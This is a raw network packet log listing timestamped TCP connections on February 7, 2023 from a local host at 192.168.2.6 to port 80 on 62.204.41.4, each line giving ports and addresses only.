Feb 7, 2023 20:04:07.892664909 CET	50435	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.893661022 CET	50436	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.952086926 CET	80	50435	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.954597950 CET	50435	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.956959009 CET	80	50436	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:07.957220078 CET	50436	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:07.968971014 CET	50436	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.031441927 CET	80	50436	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.034284115 CET	80	50436	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.034435034 CET	50436	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.143968105 CET	50436	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.144767046 CET	50437	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.204371929 CET	80	50437	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.204687119 CET	50437	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.206569910 CET	50437	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.206773043 CET	80	50436	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.212713003 CET	50436	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.266233921 CET	80	50437	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.270641088 CET	80	50437	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.274647951 CET	50437	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.383766890 CET	50437	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.384484053 CET	50438	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.443331003 CET	80	50437	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.443540096 CET	50437	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.447052956 CET	80	50438	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.447276115 CET	50438	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.447685957 CET	50438	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.509490967 CET	80	50438	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.512579918 CET	80	50438	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.512815952 CET	50438	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.627010107 CET	50438	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.627768040 CET	50439	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.688894033 CET	80	50438	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.689008951 CET	50438	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.689369917 CET	80	50439	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.689459085 CET	50439	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.690442085 CET	50439	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.752062082 CET	80	50439	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.754954100 CET	80	50439	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.755094051 CET	50439	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.863209009 CET	50439	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.867507935 CET	50440	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.925065994 CET	80	50439	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.925241947 CET	50439	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.928869009 CET	80	50440	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.929111004 CET	50440	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.934140921 CET	50440	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:08.995600939 CET	80	50440	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.998528004 CET	80	50440	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:08.998744011 CET	50440	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.112046003 CET	50440	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.113204956 CET	50441	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.173531055 CET	80	50441	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.173660040 CET	50441	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.174122095 CET	50441	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.174432993 CET	80	50440	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.174501896 CET	50440	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.233417034 CET	80	50441	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.238481045 CET	80	50441	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.238570929 CET	50441	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.347974062 CET	50441	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.349065065 CET	50442	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.407712936 CET	80	50441	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.407839060 CET	50441	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.408885002 CET	80	50442	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.409037113 CET	50442	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.409560919 CET	50442	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.469218969 CET	80	50442	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.472440004 CET	80	50442	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.472759962 CET	50442	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.581382036 CET	50442	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.582855940 CET	50443	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.641294003 CET	80	50442	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.641560078 CET	50442	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.643640041 CET	80	50443	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.643846035 CET	50443	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.644629955 CET	50443	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.705076933 CET	80	50443	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.708007097 CET	80	50443	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.708178997 CET	50443	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.830238104 CET	50443	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.831115007 CET	50444	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.890990973 CET	80	50443	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.891251087 CET	50443	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.891778946 CET	80	50444	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.891916037 CET	50444	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.894977093 CET	50444	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:09.955832005 CET	80	50444	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.958677053 CET	80	50444	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:09.958779097 CET	50444	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.071660995 CET	50444	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.072649956 CET	50445	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.132551908 CET	80	50444	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.132663965 CET	50444	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.135355949 CET	80	50445	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.135508060 CET	50445	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.137177944 CET	50445	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.199991941 CET	80	50445	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.205051899 CET	80	50445	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.205137014 CET	50445	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.321160078 CET	50445	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.322185993 CET	50446	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.383667946 CET	80	50446	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.383814096 CET	50446	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.383912086 CET	80	50445	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.383986950 CET	50445	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.384849072 CET	50446	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.446382046 CET	80	50446	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.448929071 CET	80	50446	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.449074030 CET	50446	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.565285921 CET	50446	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.566066027 CET	50447	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.627891064 CET	80	50446	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.627935886 CET	80	50447	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.627985001 CET	50446	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.628092051 CET	50447	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.628545046 CET	50447	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.690087080 CET	80	50447	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.692709923 CET	80	50447	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.693794012 CET	50447	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.822205067 CET	50447	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.823306084 CET	50448	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.884013891 CET	80	50447	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.884123087 CET	50447	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.884128094 CET	80	50448	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.884268045 CET	50448	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.888531923 CET	50448	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:10.949146986 CET	80	50448	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.952862978 CET	80	50448	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:10.953119993 CET	50448	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.064663887 CET	50448	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.065623999 CET	50449	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.125417948 CET	80	50448	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.125556946 CET	50448	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.126013994 CET	80	50449	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.126128912 CET	50449	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.130604029 CET	50449	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.191284895 CET	80	50449	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.196962118 CET	80	50449	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.197117090 CET	50449	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.318948030 CET	50449	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.320137024 CET	50450	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.379724979 CET	80	50449	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.380326033 CET	80	50450	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.380486012 CET	50449	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.380587101 CET	50450	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.381588936 CET	50450	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.441893101 CET	80	50450	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.444600105 CET	80	50450	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.446861029 CET	50450	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.564209938 CET	50450	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.564871073 CET	50451	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.624707937 CET	80	50450	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.625396967 CET	80	50451	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.625684977 CET	50450	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.625750065 CET	50451	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.626761913 CET	50451	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.687503099 CET	80	50451	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.690268040 CET	80	50451	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.690438986 CET	50451	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.798916101 CET	50451	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.799993992 CET	50452	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.859649897 CET	80	50451	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.860564947 CET	80	50452	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.860704899 CET	50451	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.860821009 CET	50452	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.861794949 CET	50452	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:11.922384977 CET	80	50452	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.924984932 CET	80	50452	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:11.926865101 CET	50452	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.034817934 CET	50452	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.036401033 CET	50453	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.095712900 CET	80	50452	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.095926046 CET	50452	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.096739054 CET	80	50453	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.098993063 CET	50453	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.107650042 CET	50453	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.167958021 CET	80	50453	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.172580957 CET	80	50453	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.175574064 CET	50453	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.284290075 CET	50453	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.285304070 CET	50454	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.344882965 CET	80	50453	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.345056057 CET	50453	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.347606897 CET	80	50454	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.347773075 CET	50454	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.348170042 CET	50454	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.410872936 CET	80	50454	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.415218115 CET	80	50454	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.415394068 CET	50454	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.518747091 CET	50454	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.519570112 CET	50455	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.579339981 CET	80	50455	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.579492092 CET	50455	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.581159115 CET	80	50454	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.581268072 CET	50454	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.584651947 CET	50455	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.644248962 CET	80	50455	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.648220062 CET	80	50455	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.648376942 CET	50455	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.756870985 CET	50455	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.757545948 CET	50456	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.816560984 CET	80	50455	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.816749096 CET	50455	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.816869974 CET	80	50456	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.816998959 CET	50456	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.818077087 CET	50456	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.877405882 CET	80	50456	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.879952908 CET	80	50456	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:12.880053997 CET	50456	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:12.999295950 CET	50456	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.000889063 CET	50457	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.058826923 CET	80	50456	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.059180021 CET	50456	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.063276052 CET	80	50457	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.063541889 CET	50457	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.065112114 CET	50457	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.127614021 CET	80	50457	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.132714033 CET	80	50457	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.132998943 CET	50457	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.237920046 CET	50457	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.240746021 CET	50458	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.300647020 CET	80	50457	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.300853014 CET	50457	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.301112890 CET	80	50458	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.301246881 CET	50458	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.302773952 CET	50458	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.363301992 CET	80	50458	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.366125107 CET	80	50458	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.366363049 CET	50458	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.471354008 CET	50458	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.475070000 CET	50459	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.531955957 CET	80	50458	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.532080889 CET	50458	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.536643982 CET	80	50459	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.536799908 CET	50459	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.538197994 CET	50459	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.599747896 CET	80	50459	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.602175951 CET	80	50459	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.602288008 CET	50459	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.710737944 CET	50459	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.711826086 CET	50460	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.771632910 CET	80	50460	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.771816015 CET	50460	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.772277117 CET	80	50459	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.772289991 CET	50460	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.772382975 CET	50459	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.831832886 CET	80	50460	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.834223032 CET	80	50460	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:13.834316969 CET	50460	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.943460941 CET	50460	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:13.944219112 CET	50461	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.003144026 CET	80	50460	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.003273010 CET	50460	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.004715919 CET	80	50461	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.004858971 CET	50461	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.005419970 CET	50461	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.066813946 CET	80	50461	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.070334911 CET	80	50461	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.070820093 CET	50461	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.190036058 CET	50461	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.191133022 CET	50462	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.250796080 CET	80	50462	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.250845909 CET	80	50461	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.250925064 CET	50462	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.251003027 CET	50461	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.252135992 CET	50462	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.311691999 CET	80	50462	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.315682888 CET	80	50462	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.316399097 CET	50462	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.427612066 CET	50462	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.428709984 CET	50463	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.487291098 CET	80	50462	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.488073111 CET	50462	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.490993977 CET	80	50463	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.491134882 CET	50463	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.491802931 CET	50463	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.552402020 CET	80	50463	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.555496931 CET	80	50463	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.559381962 CET	50463	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.674654007 CET	50463	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.675602913 CET	50464	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.735440016 CET	80	50463	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.735929012 CET	50463	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.737885952 CET	80	50464	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.739190102 CET	50464	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.739715099 CET	50464	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.802295923 CET	80	50464	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.805259943 CET	80	50464	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.809118986 CET	50464	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.924839973 CET	50464	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.925709963 CET	50465	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.987114906 CET	80	50465	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.987312078 CET	80	50464	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:14.987432003 CET	50464	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.987607002 CET	50465	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:14.989651918 CET	50465	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.051013947 CET	80	50465	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.055737972 CET	80	50465	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.057993889 CET	50465	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.174338102 CET	50465	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.175327063 CET	50466	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.235963106 CET	80	50465	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.237169027 CET	50465	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.237633944 CET	80	50466	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.237771034 CET	50466	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.238348961 CET	50466	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.301014900 CET	80	50466	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.304383993 CET	80	50466	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.307199955 CET	50466	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.426089048 CET	50466	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.426875114 CET	50467	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.488456964 CET	80	50467	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.488502026 CET	80	50466	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.488719940 CET	50466	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.491100073 CET	50467	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.494808912 CET	50467	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.556699991 CET	80	50467	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.559283018 CET	80	50467	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.559433937 CET	50467	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.675718069 CET	50467	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.681441069 CET	50468	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.737427950 CET	80	50467	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.737626076 CET	50467	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.742917061 CET	80	50468	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.743094921 CET	50468	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.743630886 CET	50468	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.805157900 CET	80	50468	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.807982922 CET	80	50468	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:15.808228016 CET	50468	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.940296888 CET	50468	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:15.941195011 CET	50469	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.002141953 CET	80	50468	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.002317905 CET	50468	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.003937960 CET	80	50469	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.004097939 CET	50469	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.004547119 CET	50469	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:04:16.068090916 CET	80	50469	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.073323011 CET	80	50469	62.204.41.4	192.168.2.6
Feb 7, 2023 20:04:16.073462963 CET	50469	80	192.168.2.6	62.204.41.4
